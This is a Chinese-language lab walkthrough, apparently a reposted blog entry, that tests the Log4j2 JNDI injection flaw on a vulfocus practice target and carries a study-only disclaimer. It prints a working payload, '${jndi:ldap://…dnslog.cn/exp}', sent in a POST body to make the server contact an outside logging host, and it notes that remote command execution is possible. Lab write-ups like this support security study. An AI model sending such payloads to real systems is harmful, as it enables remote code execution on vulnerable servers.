宣告:文章所提供的內容和工具僅供于個人學習和研究,嚴禁傳播者利用本文章的相關內容進行非法測驗,由于傳播、利用此文章所提供的資訊而造成的任何直接或者間接的后果及損失,均由使用者本人負責,文章作者不為此承擔任何責任,
用vulfocus啟動一個靶場環境,Apache Log4j2 是一個基于 Java 的日志記錄工具,該工具重寫了 Log4j 框架,并且引入了大量豐富的特性,該日志框架被大量用于業務系統開發,用來記錄日志資訊, 在大多數情況下,開發者可能會將用戶輸入導致的錯誤資訊寫入日志中,攻擊者利用此特性可通過該漏洞構造特殊的資料請求包,最終觸發遠程代碼執行,

提示當前環境測驗url:http://xxxxx/hello post引數為:payload=xxxxx
訪問:http://vulfocus.fofa.so:35273/

掃描后臺發現/error、/index.php、/hello
分別訪問:
http://vulfocus.fofa.so:35273/error

http://vulfocus.fofa.so:35273/index.php

http://vulfocus.fofa.so:35273/hello

提示:不支持請求方法“GET”
我們可以用burpsuite或者火狐瀏覽器攔截編輯發送的資料包,這里我們只是簡單利用就直接用火狐瀏覽器演示一下:

將資料提交方式改為POST,在請求主體中隨便寫點內容

發送:


回傳OK提示我們能夠成功發送資料包
再編輯重發,注意要加一個Content-Type: application/x-www-form-urlencoded:
構造payload="${jndi:ldap://987r84.dnslog.cn/exp}"

之后查看http://www.dnslog.cn/的987r84.dnslog.cn:

有對應的攻擊記錄,證明存在漏洞,
也可以在本地搭建運行JNDI服務,實作遠程任意命令執行,
文章所提供的內容和工具僅供于個人學習和研究,嚴禁傳播者利用本文章的相關內容進行非法測驗,
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/404062.html
標籤:其他
上一篇:ce游戲逆向修改之掃雷
下一篇:攻防世界 簽到題
